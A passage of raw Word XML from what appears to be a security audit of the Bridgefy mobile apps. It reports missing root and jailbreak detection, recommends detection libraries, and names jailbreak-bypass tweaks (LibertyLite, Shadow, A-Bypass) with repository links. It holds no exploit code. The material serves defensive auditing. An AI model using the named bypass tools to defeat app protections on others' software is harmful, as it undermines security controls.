        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy partially fixed this issue and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>verified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is valid. Implementation of the remaining hardening guidance is ongoing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the Android and iOS apps do not implement any form of root or Jailbreak detection features at the time of writing. Hence, the applications fail to alert users about the security implications of running the app in such an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>114</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>This issue can be confirmed by installing the application on a jailbroken/rooted device and validating the complete lack of application warnings. It should also be noted that no policy details could be identified regarding protecting users on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>jailbroken/rooted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>devices during the documentation audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to implement a comprehensive Jailbreak and root detection solution to address this problem. Please note that, since the user has root access and the application does not, the application is always at a disadvantage. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mechanisms like these should always be considered bypassable </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>when enough dedication and skill characterize the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Some freely available libraries for iOS are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>IOSSecuritySuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>115</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>DTTJailbreakDetection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>116</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, although custom checks are also possible in Swift applications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>117</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. Such solutions should be considered bypassable but sufficient to warn users about the dangers of running the application on a jailbroken device. For best results, it is recommended to test some commercial and open source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>118119</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> solutions against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>well-known</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Cydia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>tweaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>LibertyLite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>121</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>tsProtector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>8+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>122</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>A-Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. Based on this, the development team could determine the most solid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>approach.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The freely</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>rootbeer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>library</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>124</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>considered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>purpose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>of alerting users on rooted devices, while bypassable, this would be sufficient for alerting users of the dangers of running the app on rooted devices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487616512">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>119330</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="80" name="Graphic 80"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="80" name="Graphic 80"/>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9.396118pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15699968;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape65" coordorigin="1440,188" coordsize="2880,0" path="m1440,188l4320,188e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>114</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId182">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.bankinfosecurity.com/jailbreaking-ios-devices-risks-to-users-enterprises-a-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>8515</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>115</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId183">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cocoapods.org/pods/IOSSecuritySuite</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>116</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId184">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/thii/DTTJailbreakDetection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>117</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="64"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId185">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://sabatsachin.medium.com/detect-jailbreak-device-in-swift-5-ios-programatically-da467028242d</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId184">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/thii/DTTJailbreakDetection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>119</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId186">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/securing/IOSSecuritySuite</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId187">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>http://ryleyangus.com/repo/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>121</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId188">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://ios.jjolano.me/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>122</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId189">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>http://apt.thebigboss.org/repofiles/cydia/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId190">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://repo.rpgfarm.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>124</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId191">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/scottyab/rootbeer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="197"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-020</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP4/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>takeover</w:t>
      </w:r>
      <w:r>
